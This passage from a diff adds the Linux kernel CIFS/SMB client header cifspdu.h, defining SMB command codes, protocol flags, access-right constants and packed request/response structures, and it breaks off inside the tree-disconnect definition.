++++ b/fs/smb/client/cifspdu.h
+@@ -0,0 +1,2730 @@
++/* SPDX-License-Identifier: LGPL-2.1 */
++/*
++ *
++ *   Copyright (c) International Business Machines  Corp., 2002,2009
++ *   Author(s): Steve French (sfrench@us.ibm.com)
++ *
++ */
++
++#ifndef _CIFSPDU_H
++#define _CIFSPDU_H
++
++#include <net/sock.h>
++#include <asm/unaligned.h>
++#include "../common/smbfsctl.h"
++
++#define CIFS_PROT   0
++#define POSIX_PROT  (CIFS_PROT+1)
++#define BAD_PROT 0xFFFF
++
++/* SMB command codes:
++ * Note some commands have minimal (wct=0, bcc=0), or uninteresting, responses
++ * (i.e. ones which include no useful data other than the SMB error code itself).
++ * This can allow us to avoid response buffer allocations and copies in some cases.
++ */
++#define SMB_COM_CREATE_DIRECTORY      0x00 /* trivial response */
++#define SMB_COM_DELETE_DIRECTORY      0x01 /* trivial response */
++#define SMB_COM_CLOSE                 0x04 /* triv req/rsp, timestamp ignored */
++#define SMB_COM_FLUSH                 0x05 /* triv req/rsp */
++#define SMB_COM_DELETE                0x06 /* trivial response */
++#define SMB_COM_RENAME                0x07 /* trivial response */
++#define SMB_COM_QUERY_INFORMATION     0x08 /* aka getattr */
++#define SMB_COM_SETATTR               0x09 /* trivial response */
++#define SMB_COM_LOCKING_ANDX          0x24 /* trivial response */
++#define SMB_COM_COPY                  0x29 /* trivial rsp, failed filename ignored */
++#define SMB_COM_ECHO                  0x2B /* echo request */
++#define SMB_COM_OPEN_ANDX             0x2D /* Legacy open for old servers */
++#define SMB_COM_READ_ANDX             0x2E
++#define SMB_COM_WRITE_ANDX            0x2F
++#define SMB_COM_TRANSACTION2          0x32
++#define SMB_COM_TRANSACTION2_SECONDARY 0x33
++#define SMB_COM_FIND_CLOSE2           0x34 /* trivial response */
++#define SMB_COM_TREE_DISCONNECT       0x71 /* trivial response */
++#define SMB_COM_NEGOTIATE             0x72
++#define SMB_COM_SESSION_SETUP_ANDX    0x73
++#define SMB_COM_LOGOFF_ANDX           0x74 /* trivial response */
++#define SMB_COM_TREE_CONNECT_ANDX     0x75
++#define SMB_COM_NT_TRANSACT           0xA0
++#define SMB_COM_NT_TRANSACT_SECONDARY 0xA1
++#define SMB_COM_NT_CREATE_ANDX        0xA2
++#define SMB_COM_NT_CANCEL             0xA4 /* no response */
++#define SMB_COM_NT_RENAME             0xA5 /* trivial response */
++
++/* Transact2 subcommand codes */
++#define TRANS2_OPEN                   0x00
++#define TRANS2_FIND_FIRST             0x01
++#define TRANS2_FIND_NEXT              0x02
++#define TRANS2_QUERY_FS_INFORMATION   0x03
++#define TRANS2_SET_FS_INFORMATION     0x04
++#define TRANS2_QUERY_PATH_INFORMATION 0x05
++#define TRANS2_SET_PATH_INFORMATION   0x06
++#define TRANS2_QUERY_FILE_INFORMATION 0x07
++#define TRANS2_SET_FILE_INFORMATION   0x08
++#define TRANS2_GET_DFS_REFERRAL       0x10
++#define TRANS2_REPORT_DFS_INCOSISTENCY 0x11
++
++/* SMB Transact (Named Pipe) subcommand codes */
++#define TRANS_SET_NMPIPE_STATE      0x0001
++#define TRANS_RAW_READ_NMPIPE       0x0011
++#define TRANS_QUERY_NMPIPE_STATE    0x0021
++#define TRANS_QUERY_NMPIPE_INFO     0x0022
++#define TRANS_PEEK_NMPIPE           0x0023
++#define TRANS_TRANSACT_NMPIPE       0x0026
++#define TRANS_RAW_WRITE_NMPIPE      0x0031
++#define TRANS_READ_NMPIPE           0x0036
++#define TRANS_WRITE_NMPIPE          0x0037
++#define TRANS_WAIT_NMPIPE           0x0053
++#define TRANS_CALL_NMPIPE           0x0054
++
++/* NT Transact subcommand codes */
++#define NT_TRANSACT_CREATE            0x01
++#define NT_TRANSACT_IOCTL             0x02
++#define NT_TRANSACT_SET_SECURITY_DESC 0x03
++#define NT_TRANSACT_NOTIFY_CHANGE     0x04
++#define NT_TRANSACT_RENAME            0x05
++#define NT_TRANSACT_QUERY_SECURITY_DESC 0x06
++#define NT_TRANSACT_GET_USER_QUOTA    0x07
++#define NT_TRANSACT_SET_USER_QUOTA    0x08
++
++#define MAX_CIFS_SMALL_BUFFER_SIZE 448 /* big enough for most */
++/* a future chained NTCreateXReadX would be bigger, but for the time being */
++/* NTCreateX is the biggest among the requests (its response is bigger, with a wct of 34) */
++#define MAX_CIFS_HDR_SIZE 0x58 /* 4 len + 32 hdr + (2*24 wct) + 2 bct + 2 pad */
++#define CIFS_SMALL_PATH 120 /* allows for (448-88)/3 */
++
++/* internal cifs vfs structures */
++/*****************************************************************
++ * All constants go here
++ *****************************************************************
++ */
++
++/*
++ * Starting value for maximum SMB size negotiation
++ */
++#define CIFS_MAX_MSGSIZE (4*4096)
++
++/*
++ * Size of encrypted user password in bytes
++ */
++#define CIFS_ENCPWD_SIZE (16)
++
++/*
++ * Size of the crypto key returned on the negotiate SMB in bytes
++ */
++#define CIFS_CRYPTO_KEY_SIZE (8)
++
++/*
++ * Size of the ntlm client response
++ */
++#define CIFS_AUTH_RESP_SIZE (24)
++
++/*
++ * Size of the session key (crypto key encrypted with the password)
++ */
++#define CIFS_SESS_KEY_SIZE (16)
++
++#define CIFS_SERVER_CHALLENGE_SIZE (8)
++#define CIFS_HMAC_MD5_HASH_SIZE (16)
++#define CIFS_CPHTXT_SIZE (16)
++#define CIFS_NTHASH_SIZE (16)
++
++/*
++ * Maximum user name length
++ */
++#define CIFS_UNLEN (20)
++
++/*
++ * Flags on SMB open
++ */
++#define SMBOPEN_WRITE_THROUGH 0x4000
++#define SMBOPEN_DENY_ALL      0x0010
++#define SMBOPEN_DENY_WRITE    0x0020
++#define SMBOPEN_DENY_READ     0x0030
++#define SMBOPEN_DENY_NONE     0x0040
++#define SMBOPEN_READ          0x0000
++#define SMBOPEN_WRITE         0x0001
++#define SMBOPEN_READWRITE     0x0002
++#define SMBOPEN_EXECUTE       0x0003
++
++#define SMBOPEN_OCREATE       0x0010
++#define SMBOPEN_OTRUNC        0x0002
++#define SMBOPEN_OAPPEND       0x0001
++
++/*
++ * SMB flag definitions
++ */
++#define SMBFLG_EXTD_LOCK 0x01	/* server supports lock-read write-unlock smb */
++#define SMBFLG_RCV_POSTED 0x02	/* obsolete */
++#define SMBFLG_RSVD 0x04
++#define SMBFLG_CASELESS 0x08	/* all pathnames treated as caseless (off
++				implies case sensitive file handling request) */
++#define SMBFLG_CANONICAL_PATH_FORMAT 0x10	/* obsolete */
++#define SMBFLG_OLD_OPLOCK 0x20	/* obsolete */
++#define SMBFLG_OLD_OPLOCK_NOTIFY 0x40	/* obsolete */
++#define SMBFLG_RESPONSE 0x80	/* this PDU is a response from server */
++
++/*
++ * SMB flag2 definitions
++ */
++#define SMBFLG2_KNOWS_LONG_NAMES cpu_to_le16(1)	/* can send long (non-8.3)
++						   path names in response */
++#define SMBFLG2_KNOWS_EAS cpu_to_le16(2)
++#define SMBFLG2_SECURITY_SIGNATURE cpu_to_le16(4)
++#define SMBFLG2_COMPRESSED (8)
++#define SMBFLG2_SECURITY_SIGNATURE_REQUIRED (0x10)
++#define SMBFLG2_IS_LONG_NAME cpu_to_le16(0x40)
++#define SMBFLG2_REPARSE_PATH (0x400)
++#define SMBFLG2_EXT_SEC cpu_to_le16(0x800)
++#define SMBFLG2_DFS cpu_to_le16(0x1000)
++#define SMBFLG2_PAGING_IO cpu_to_le16(0x2000)
++#define SMBFLG2_ERR_STATUS cpu_to_le16(0x4000)
++#define SMBFLG2_UNICODE cpu_to_le16(0x8000)
++
++/*
++ * These are the file access permission bits defined in CIFS for the
++ * NTCreateAndX as well as the level 0x107
++ * TRANS2_QUERY_PATH_INFORMATION API.  The level 0x107, SMB_QUERY_FILE_ALL_INFO
++ * responds with the AccessFlags.
++ * The AccessFlags specifies the access permissions a caller has to the
++ * file and can have any suitable combination of the following values:
++ */
++
++#define FILE_READ_DATA        0x00000001  /* Data can be read from the file   */
++#define FILE_WRITE_DATA       0x00000002  /* Data can be written to the file  */
++#define FILE_APPEND_DATA      0x00000004  /* Data can be appended to the file */
++#define FILE_READ_EA          0x00000008  /* Extended attributes associated   */
++					  /* with the file can be read        */
++#define FILE_WRITE_EA         0x00000010  /* Extended attributes associated   */
++					  /* with the file can be written     */
++#define FILE_EXECUTE          0x00000020  /*Data can be read into memory from */
++					  /* the file using system paging I/O */
++#define FILE_DELETE_CHILD     0x00000040
++#define FILE_READ_ATTRIBUTES  0x00000080  /* Attributes associated with the   */
++					  /* file can be read                 */
++#define FILE_WRITE_ATTRIBUTES 0x00000100  /* Attributes associated with the   */
++					  /* file can be written              */
++#define DELETE                0x00010000  /* The file can be deleted          */
++#define READ_CONTROL          0x00020000  /* The access control list and      */
++					  /* ownership associated with the    */
++					  /* file can be read                 */
++#define WRITE_DAC             0x00040000  /* The access control list and      */
++					  /* ownership associated with the    */
++					  /* file can be written.             */
++#define WRITE_OWNER           0x00080000  /* Ownership information associated */
++					  /* with the file can be written     */
++#define SYNCHRONIZE           0x00100000  /* The file handle can be waited on to */
++					  /* synchronize with the completion  */
++					  /* of an input/output request       */
++#define SYSTEM_SECURITY       0x01000000  /* The system access control list   */
++					  /* can be read and changed          */
++#define GENERIC_ALL           0x10000000
++#define GENERIC_EXECUTE       0x20000000
++#define GENERIC_WRITE         0x40000000
++#define GENERIC_READ          0x80000000
++					 /* In summary - Relevant file       */
++					 /* access flags from CIFS are       */
++					 /* file_read_data, file_write_data  */
++					 /* file_execute, file_read_attributes*/
++					 /* write_dac, and delete.           */
++
++#define FILE_READ_RIGHTS (FILE_READ_DATA | FILE_READ_EA | FILE_READ_ATTRIBUTES)
++#define FILE_WRITE_RIGHTS (FILE_WRITE_DATA | FILE_APPEND_DATA \
++				| FILE_WRITE_EA | FILE_WRITE_ATTRIBUTES)
++#define FILE_EXEC_RIGHTS (FILE_EXECUTE)
++
++#define SET_FILE_READ_RIGHTS (FILE_READ_DATA | FILE_READ_EA | FILE_WRITE_EA \
++				| FILE_READ_ATTRIBUTES \
++				| FILE_WRITE_ATTRIBUTES \
++				| DELETE | READ_CONTROL | WRITE_DAC \
++				| WRITE_OWNER | SYNCHRONIZE)
++#define SET_FILE_WRITE_RIGHTS (FILE_WRITE_DATA | FILE_APPEND_DATA \
++				| FILE_READ_EA | FILE_WRITE_EA \
++				| FILE_READ_ATTRIBUTES \
++				| FILE_WRITE_ATTRIBUTES \
++				| DELETE | READ_CONTROL | WRITE_DAC \
++				| WRITE_OWNER | SYNCHRONIZE)
++#define SET_FILE_EXEC_RIGHTS (FILE_READ_EA | FILE_WRITE_EA | FILE_EXECUTE \
++				| FILE_READ_ATTRIBUTES \
++				| FILE_WRITE_ATTRIBUTES \
++				| DELETE | READ_CONTROL | WRITE_DAC \
++				| WRITE_OWNER | SYNCHRONIZE)
++
++#define SET_MINIMUM_RIGHTS (FILE_READ_EA | FILE_READ_ATTRIBUTES \
++				| READ_CONTROL | SYNCHRONIZE)
++
++
++/*
++ * Invalid readdir handle
++ */
++#define CIFS_NO_HANDLE        0xFFFF
++
++#define NO_CHANGE_64          0xFFFFFFFFFFFFFFFFULL
++
++/* IPC$ in ASCII */
++#define CIFS_IPC_RESOURCE "\x49\x50\x43\x24"
++
++/* IPC$ in Unicode */
++#define CIFS_IPC_UNICODE_RESOURCE "\x00\x49\x00\x50\x00\x43\x00\x24\x00\x00"
++
++/* Unicode Null terminate 2 bytes of 0 */
++#define UNICODE_NULL "\x00\x00"
++#define ASCII_NULL 0x00
++
++/*
++ * Server type values (returned on the EnumServer API call)
++ */
++#define CIFS_SV_TYPE_DC     0x00000008
++#define CIFS_SV_TYPE_BACKDC 0x00000010
++
++/*
++ * Alias type flags (From EnumAlias API call
++ */
++#define CIFS_ALIAS_TYPE_FILE 0x0001
++#define CIFS_SHARE_TYPE_FILE 0x0000
++
++/*
++ * File Attribute flags
++ */
++#define ATTR_READONLY  0x0001
++#define ATTR_HIDDEN    0x0002
++#define ATTR_SYSTEM    0x0004
++#define ATTR_VOLUME    0x0008
++#define ATTR_DIRECTORY 0x0010
++#define ATTR_ARCHIVE   0x0020
++#define ATTR_DEVICE    0x0040
++#define ATTR_NORMAL    0x0080
++#define ATTR_TEMPORARY 0x0100
++#define ATTR_SPARSE    0x0200
++#define ATTR_REPARSE   0x0400
++#define ATTR_COMPRESSED 0x0800
++#define ATTR_OFFLINE    0x1000	/* i.e. file not immediately available -
++					on offline storage */
++#define ATTR_NOT_CONTENT_INDEXED 0x2000
++#define ATTR_ENCRYPTED  0x4000
++#define ATTR_POSIX_SEMANTICS 0x01000000
++#define ATTR_BACKUP_SEMANTICS 0x02000000
++#define ATTR_DELETE_ON_CLOSE 0x04000000
++#define ATTR_SEQUENTIAL_SCAN 0x08000000
++#define ATTR_RANDOM_ACCESS   0x10000000
++#define ATTR_NO_BUFFERING    0x20000000
++#define ATTR_WRITE_THROUGH   0x80000000
++
++/* ShareAccess flags */
++#define FILE_NO_SHARE     0x00000000
++#define FILE_SHARE_READ   0x00000001
++#define FILE_SHARE_WRITE  0x00000002
++#define FILE_SHARE_DELETE 0x00000004
++#define FILE_SHARE_ALL    0x00000007
++
++/* CreateDisposition flags, similar to CreateAction as well */
++#define FILE_SUPERSEDE    0x00000000
++#define FILE_OPEN         0x00000001
++#define FILE_CREATE       0x00000002
++#define FILE_OPEN_IF      0x00000003
++#define FILE_OVERWRITE    0x00000004
++#define FILE_OVERWRITE_IF 0x00000005
++
++/* CreateOptions */
++#define CREATE_NOT_FILE		0x00000001	/* if set must not be file */
++#define CREATE_WRITE_THROUGH	0x00000002
++#define CREATE_SEQUENTIAL       0x00000004
++#define CREATE_NO_BUFFER        0x00000008      /* should not buffer on srv */
++#define CREATE_SYNC_ALERT       0x00000010	/* MBZ */
++#define CREATE_ASYNC_ALERT      0x00000020	/* MBZ */
++#define CREATE_NOT_DIR		0x00000040    /* if set must not be directory */
++#define CREATE_TREE_CONNECTION  0x00000080	/* should be zero */
++#define CREATE_COMPLETE_IF_OPLK 0x00000100	/* should be zero */
++#define CREATE_NO_EA_KNOWLEDGE  0x00000200
++#define CREATE_EIGHT_DOT_THREE  0x00000400	/* doc says this is the obsolete
++						 "open for recovery" flag, which
++						 should be zero in any case */
++#define CREATE_OPEN_FOR_RECOVERY 0x00000400
++#define CREATE_RANDOM_ACCESS	0x00000800
++#define CREATE_DELETE_ON_CLOSE	0x00001000
++#define CREATE_OPEN_BY_ID       0x00002000
++#define CREATE_OPEN_BACKUP_INTENT 0x00004000
++#define CREATE_NO_COMPRESSION   0x00008000
++#define CREATE_RESERVE_OPFILTER 0x00100000	/* should be zero */
++#define OPEN_REPARSE_POINT	0x00200000
++#define OPEN_NO_RECALL          0x00400000
++#define OPEN_FREE_SPACE_QUERY   0x00800000	/* should be zero */
++#define CREATE_OPTIONS_MASK     0x007FFFFF
++#define CREATE_OPTION_READONLY	0x10000000
++#define CREATE_OPTION_SPECIAL   0x20000000   /* system. NB not sent over wire */
++
++/* ImpersonationLevel flags */
++#define SECURITY_ANONYMOUS      0
++#define SECURITY_IDENTIFICATION 1
++#define SECURITY_IMPERSONATION  2
++#define SECURITY_DELEGATION     3
++
++/* SecurityFlags */
++#define SECURITY_CONTEXT_TRACKING 0x01
++#define SECURITY_EFFECTIVE_ONLY   0x02
++
++/*
++ * Default PID value, used in all SMBs where the PID is not important
++ */
++#define CIFS_DFT_PID  0x1234
++
++/*
++ * We use the same routine for Copy and Move SMBs.  This flag is used to
++ * distinguish between them.
++ */
++#define CIFS_COPY_OP 1
++#define CIFS_RENAME_OP 2
++
++#define GETU16(var)  (*((__u16 *)var))	/* BB check for endian issues */
++#define GETU32(var)  (*((__u32 *)var))	/* BB check for endian issues */
++
++struct smb_hdr {
++	__be32 smb_buf_length;	/* BB length is only two (rarely three) bytes,
++		with a one- or two-byte "type" preceding it that will be
++		zero - we could mask the type byte off */
++	__u8 Protocol[4];
++	__u8 Command;
++	union {
++		struct {
++			__u8 ErrorClass;
++			__u8 Reserved;
++			__le16 Error;
++		} __attribute__((packed)) DosError;
++		__le32 CifsError;
++	} __attribute__((packed)) Status;
++	__u8 Flags;
++	__le16 Flags2;		/* note: le */
++	__le16 PidHigh;
++	union {
++		struct {
++			__le32 SequenceNumber;  /* le */
++			__u32 Reserved; /* zero */
++		} __attribute__((packed)) Sequence;
++		__u8 SecuritySignature[8];	/* le */
++	} __attribute__((packed)) Signature;
++	__u8 pad[2];
++	__u16 Tid;
++	__le16 Pid;
++	__u16 Uid;
++	__le16 Mid;
++	__u8 WordCount;
++} __attribute__((packed));
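++
++/*
++ * Size note (illustrative): packed as above, struct smb_hdr is 37 bytes:
++ * the 4-byte RFC 1001 length prefix, the 32-byte on-the-wire SMB header,
++ * and the 1-byte WordCount that starts the parameter block.
++ */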
++
++/* given a pointer to an smb_hdr, retrieve a void pointer to the ByteCount */
++static inline void *
++BCC(struct smb_hdr *smb)
++{
++	return (void *)smb + sizeof(*smb) + 2 * smb->WordCount;
++}
++
++/* given a pointer to an smb_hdr retrieve the pointer to the byte area */
++#define pByteArea(smb_var) (BCC(smb_var) + 2)
++
++/* get the unconverted ByteCount for an SMB packet and return it */
++static inline __u16
++get_bcc(struct smb_hdr *hdr)
++{
++	__le16 *bc_ptr = (__le16 *)BCC(hdr);
++
++	return get_unaligned_le16(bc_ptr);
++}
++
++/* set the ByteCount for a SMB packet in little-endian */
++static inline void
++put_bcc(__u16 count, struct smb_hdr *hdr)
++{
++	__le16 *bc_ptr = (__le16 *)BCC(hdr);
++
++	put_unaligned_le16(count, bc_ptr);
++}
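++
++/*
++ * Worked example (illustrative): for a CLOSE request (wct = 3) the
++ * ByteCount sits 2 * 3 = 6 bytes past the header, i.e. BCC() returns
++ * (void *)smb + sizeof(struct smb_hdr) + 6, and pByteArea() points two
++ * bytes beyond that, at the start of the data area.
++ */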
++
++/*
++ * Computer Name Length (since the NetBIOS name was length 16 with last byte 0x20)
++ * No longer as important, now that TCP names are more commonly used to
++ * resolve hosts.
++ */
++#define CNLEN 15
++
++/*
++ * Share Name Length (SNLEN)
++ * Note:  This length was limited by the SMB used to get
++ *        the Share info.   NetShareEnum only returned 13
++ *        chars, including the null termination.
++ * This was removed because it is no longer limiting.
++ */
++
++/*
++ * Comment Length
++ */
++#define MAXCOMMENTLEN 40
++
++/*
++ * The OS/2 maximum path name
++ */
++#define MAX_PATHCONF 256
++
++/*
++ *  SMB frame definitions  (following must be packed structs)
++ *  See the SNIA CIFS Specification for details.
++ *
++ *  The Naming convention is the lower case version of the
++ *  smb command code name for the struct, and this is typedef'ed to the
++ *  uppercase version of the same name with the prefix SMB_ removed
++ *  for brevity.  Although typedefs are not commonly used for
++ *  structure definitions in the Linux kernel, their use in the
++ *  CIFS standards document, which this code is based on, may
++ *  make this one of the cases where typedefs for structures make
++ *  sense to improve readability for readers of the standards doc.
++ *  Typedefs can always be removed later if they are too distracting
++ *  and they are only used for the CIFS PDUs themselves, not
++ *  internal cifs vfs structures
++ *
++ */
++
++typedef struct negotiate_req {
++	struct smb_hdr hdr;	/* wct = 0 */
++	__le16 ByteCount;
++	unsigned char DialectsArray[];
++} __attribute__((packed)) NEGOTIATE_REQ;
++
++#define MIN_TZ_ADJ (15 * 60) /* minimum grid for timezones in seconds */
++
++#define READ_RAW_ENABLE 1
++#define WRITE_RAW_ENABLE 2
++#define RAW_ENABLE (READ_RAW_ENABLE | WRITE_RAW_ENABLE)
++#define SMB1_CLIENT_GUID_SIZE (16)
++typedef struct negotiate_rsp {
++	struct smb_hdr hdr;	/* wct = 17 */
++	__le16 DialectIndex; /* 0xFFFF = no dialect acceptable */
++	__u8 SecurityMode;
++	__le16 MaxMpxCount;
++	__le16 MaxNumberVcs;
++	__le32 MaxBufferSize;
++	__le32 MaxRawSize;
++	__le32 SessionKey;
++	__le32 Capabilities;	/* see below */
++	__le32 SystemTimeLow;
++	__le32 SystemTimeHigh;
++	__le16 ServerTimeZone;
++	__u8 EncryptionKeyLength;
++	__u16 ByteCount;
++	union {
++		/* cap extended security off */
++		DECLARE_FLEX_ARRAY(unsigned char, EncryptionKey);
++		/* followed by Domain name - if extended security is off */
++		/* followed by 16 bytes of server GUID */
++		/* then security blob if cap_extended_security negotiated */
++		struct {
++			unsigned char GUID[SMB1_CLIENT_GUID_SIZE];
++			unsigned char SecurityBlob[];
++		} __attribute__((packed)) extended_response;
++	} __attribute__((packed)) u;
++} __attribute__((packed)) NEGOTIATE_RSP;
++
++/* SecurityMode bits */
++#define SECMODE_USER          0x01	/* off indicates share level security */
++#define SECMODE_PW_ENCRYPT    0x02
++#define SECMODE_SIGN_ENABLED  0x04	/* SMB security signatures enabled */
++#define SECMODE_SIGN_REQUIRED 0x08	/* SMB security signatures required */
++
++/* Negotiate response Capabilities */
++#define CAP_RAW_MODE           0x00000001
++#define CAP_MPX_MODE           0x00000002
++#define CAP_UNICODE            0x00000004
++#define CAP_LARGE_FILES        0x00000008
++#define CAP_NT_SMBS            0x00000010	/* implies CAP_NT_FIND */
++#define CAP_RPC_REMOTE_APIS    0x00000020
++#define CAP_STATUS32           0x00000040
++#define CAP_LEVEL_II_OPLOCKS   0x00000080
++#define CAP_LOCK_AND_READ      0x00000100
++#define CAP_NT_FIND            0x00000200
++#define CAP_DFS                0x00001000
++#define CAP_INFOLEVEL_PASSTHRU 0x00002000
++#define CAP_LARGE_READ_X       0x00004000
++#define CAP_LARGE_WRITE_X      0x00008000
++#define CAP_LWIO               0x00010000 /* support fctl_srv_req_resume_key */
++#define CAP_UNIX               0x00800000
++#define CAP_COMPRESSED_DATA    0x02000000
++#define CAP_DYNAMIC_REAUTH     0x20000000
++#define CAP_PERSISTENT_HANDLES 0x40000000
++#define CAP_EXTENDED_SECURITY  0x80000000
++
++typedef union smb_com_session_setup_andx {
++	struct {		/* request format */
++		struct smb_hdr hdr;	/* wct = 12 */
++		__u8 AndXCommand;
++		__u8 AndXReserved;
++		__le16 AndXOffset;
++		__le16 MaxBufferSize;
++		__le16 MaxMpxCount;
++		__le16 VcNumber;
++		__u32 SessionKey;
++		__le16 SecurityBlobLength;
++		__u32 Reserved;
++		__le32 Capabilities;	/* see below */
++		__le16 ByteCount;
++		unsigned char SecurityBlob[1];	/* followed by */
++		/* STRING NativeOS */
++		/* STRING NativeLanMan */
++	} __attribute__((packed)) req;	/* NTLM request format (with
++					extended security) */
++
++	struct {		/* request format */
++		struct smb_hdr hdr;	/* wct = 13 */
++		__u8 AndXCommand;
++		__u8 AndXReserved;
++		__le16 AndXOffset;
++		__le16 MaxBufferSize;
++		__le16 MaxMpxCount;
++		__le16 VcNumber;
++		__u32 SessionKey;
++		__le16 CaseInsensitivePasswordLength; /* ASCII password len */
++		__le16 CaseSensitivePasswordLength; /* Unicode password length*/
++		__u32 Reserved;	/* see below */
++		__le32 Capabilities;
++		__le16 ByteCount;
++		unsigned char CaseInsensitivePassword[1];     /* followed by: */
++		/* unsigned char * CaseSensitivePassword; */
++		/* STRING AccountName */
++		/* STRING PrimaryDomain */
++		/* STRING NativeOS */
++		/* STRING NativeLanMan */
++	} __attribute__((packed)) req_no_secext; /* NTLM request format (without
++							extended security) */
++
++	struct {		/* default (NTLM) response format */
++		struct smb_hdr hdr;	/* wct = 4 */
++		__u8 AndXCommand;
++		__u8 AndXReserved;
++		__le16 AndXOffset;
++		__le16 Action;	/* see below */
++		__le16 SecurityBlobLength;
++		__u16 ByteCount;
++		unsigned char SecurityBlob[1];	/* followed by */
++/*      unsigned char  * NativeOS;      */
++/*	unsigned char  * NativeLanMan;  */
++/*      unsigned char  * PrimaryDomain; */
++	} __attribute__((packed)) resp;	/* NTLM response
++					   (with or without extended sec) */
++
++	struct {		/* request format */
++		struct smb_hdr hdr;	/* wct = 10 */
++		__u8 AndXCommand;
++		__u8 AndXReserved;
++		__le16 AndXOffset;
++		__le16 MaxBufferSize;
++		__le16 MaxMpxCount;
++		__le16 VcNumber;
++		__u32 SessionKey;
++		__le16 PasswordLength;
++		__u32 Reserved; /* encrypt key len and offset */
++		__le16 ByteCount;
++		unsigned char AccountPassword[1];	/* followed by */
++		/* STRING AccountName */
++		/* STRING PrimaryDomain */
++		/* STRING NativeOS */
++		/* STRING NativeLanMan */
++	} __attribute__((packed)) old_req; /* pre-NTLM (LANMAN2.1) req format */
++
++	struct {		/* default (NTLM) response format */
++		struct smb_hdr hdr;	/* wct = 3 */
++		__u8 AndXCommand;
++		__u8 AndXReserved;
++		__le16 AndXOffset;
++		__le16 Action;	/* see below */
++		__u16 ByteCount;
++		unsigned char NativeOS[1];	/* followed by */
++/*	unsigned char * NativeLanMan; */
++/*      unsigned char * PrimaryDomain; */
++	} __attribute__((packed)) old_resp; /* pre-NTLM (LANMAN2.1) response */
++} __attribute__((packed)) SESSION_SETUP_ANDX;
++
++/* format of NTLMv2 Response, i.e. "case sensitive password" hash, when NTLMv2 */
++
++#define NTLMSSP_SERVER_TYPE	1
++#define NTLMSSP_DOMAIN_TYPE	2
++#define NTLMSSP_FQ_DOMAIN_TYPE	3
++#define NTLMSSP_DNS_DOMAIN_TYPE	4
++#define NTLMSSP_DNS_PARENT_TYPE	5
++
++struct ntlmssp2_name {
++	__le16 type;
++	__le16 length;
++/*	char   name[length]; */
++} __attribute__((packed));
++
++struct ntlmv2_resp {
++	union {
++	    char ntlmv2_hash[CIFS_ENCPWD_SIZE];
++	    struct {
++		__u8 reserved[8];
++		__u8 key[CIFS_SERVER_CHALLENGE_SIZE];
++	    } __attribute__((packed)) challenge;
++	} __attribute__((packed));
++	__le32 blob_signature;
++	__u32  reserved;
++	__le64  time;
++	__u64  client_chal; /* random */
++	__u32  reserved2;
++	/* array of name entries could follow ending in minimum 4 byte struct */
++} __attribute__((packed));
++
++
++#define CIFS_NETWORK_OPSYS "CIFS VFS Client for Linux"
++
++/* Capabilities bits (for NTLM SessSetup request) */
++#define CAP_UNICODE            0x00000004
++#define CAP_LARGE_FILES        0x00000008
++#define CAP_NT_SMBS            0x00000010
++#define CAP_STATUS32           0x00000040
++#define CAP_LEVEL_II_OPLOCKS   0x00000080
++#define CAP_NT_FIND            0x00000200	/* reserved should be zero
++				(because NT_SMBs implies the same thing?) */
++#define CAP_BULK_TRANSFER      0x20000000
++#define CAP_EXTENDED_SECURITY  0x80000000
++
++/* Action bits */
++#define GUEST_LOGIN 1
++
++typedef struct smb_com_tconx_req {
++	struct smb_hdr hdr;	/* wct = 4 */
++	__u8 AndXCommand;
++	__u8 AndXReserved;
++	__le16 AndXOffset;
++	__le16 Flags;		/* see below */
++	__le16 PasswordLength;
++	__le16 ByteCount;
++	unsigned char Password[1];	/* followed by */
++/* STRING Path    *//* \\server\share name */
++	/* STRING Service */
++} __attribute__((packed)) TCONX_REQ;
++
++typedef struct smb_com_tconx_rsp {
++	struct smb_hdr hdr;	/* wct = 3 , not extended response */
++	__u8 AndXCommand;
++	__u8 AndXReserved;
++	__le16 AndXOffset;
++	__le16 OptionalSupport;	/* see below */
++	__u16 ByteCount;
++	unsigned char Service[1];	/* always ASCII, not Unicode */
++	/* STRING NativeFileSystem */
++} __attribute__((packed)) TCONX_RSP;
++
++typedef struct smb_com_tconx_rsp_ext {
++	struct smb_hdr hdr;	/* wct = 7, extended response */
++	__u8 AndXCommand;
++	__u8 AndXReserved;
++	__le16 AndXOffset;
++	__le16 OptionalSupport;	/* see below */
++	__le32 MaximalShareAccessRights;
++	__le32 GuestMaximalShareAccessRights;
++	__u16 ByteCount;
++	unsigned char Service[1];	/* always ASCII, not Unicode */
++	/* STRING NativeFileSystem */
++} __attribute__((packed)) TCONX_RSP_EXT;
++
++
++/* tree connect Flags */
++#define DISCONNECT_TID          0x0001
++#define TCON_EXTENDED_SIGNATURES 0x0004
++#define TCON_EXTENDED_SECINFO   0x0008
++
++/* OptionalSupport bits */
++#define SMB_SUPPORT_SEARCH_BITS 0x0001	/* "must have" directory search bits
++					 (exclusive searches supported) */
++#define SMB_SHARE_IS_IN_DFS     0x0002
++#define SMB_CSC_MASK               0x000C
++/* CSC flags defined as follows */
++#define SMB_CSC_CACHE_MANUAL_REINT 0x0000
++#define SMB_CSC_CACHE_AUTO_REINT   0x0004
++#define SMB_CSC_CACHE_VDO          0x0008
++#define SMB_CSC_NO_CACHING         0x000C
++#define SMB_UNIQUE_FILE_NAME    0x0010
++#define SMB_EXTENDED_SIGNATURES 0x0020
++
++/* services
++ *
++ * A:       i.e. disk
++ * LPT1:    i.e. printer
++ * IPC      i.e. named pipe
++ * COMM
++ * ?????    i.e. any type
++ *
++ */
++
++typedef struct smb_com_echo_req {
++	struct	smb_hdr hdr;
++	__le16	EchoCount;
++	__le16	ByteCount;
++	char	Data[1];
++} __attribute__((packed)) ECHO_REQ;
++
++typedef struct smb_com_echo_rsp {
++	struct	smb_hdr hdr;
++	__le16	SequenceNumber;
++	__le16	ByteCount;
++	char	Data[1];
++} __attribute__((packed)) ECHO_RSP;
++
++typedef struct smb_com_logoff_andx_req {
++	struct smb_hdr hdr;	/* wct = 2 */
++	__u8 AndXCommand;
++	__u8 AndXReserved;
++	__u16 AndXOffset;
++	__u16 ByteCount;
++} __attribute__((packed)) LOGOFF_ANDX_REQ;
++
++typedef struct smb_com_logoff_andx_rsp {
++	struct smb_hdr hdr;	/* wct = 2 */
++	__u8 AndXCommand;
++	__u8 AndXReserved;
++	__u16 AndXOffset;
++	__u16 ByteCount;
++} __attribute__((packed)) LOGOFF_ANDX_RSP;
++
++typedef union smb_com_tree_disconnect {	/* as an alternative, can use a flag on
++					the tree_connect PDU to effect disconnect */
++					/* tdis is probably the simplest SMB PDU */
++	struct {
++		struct smb_hdr hdr;	/* wct = 0 */
++		__u16 ByteCount;	/* bcc = 0 */
++	} __attribute__((packed)) req;
++	struct {
++		struct smb_hdr hdr;	/* wct = 0 */
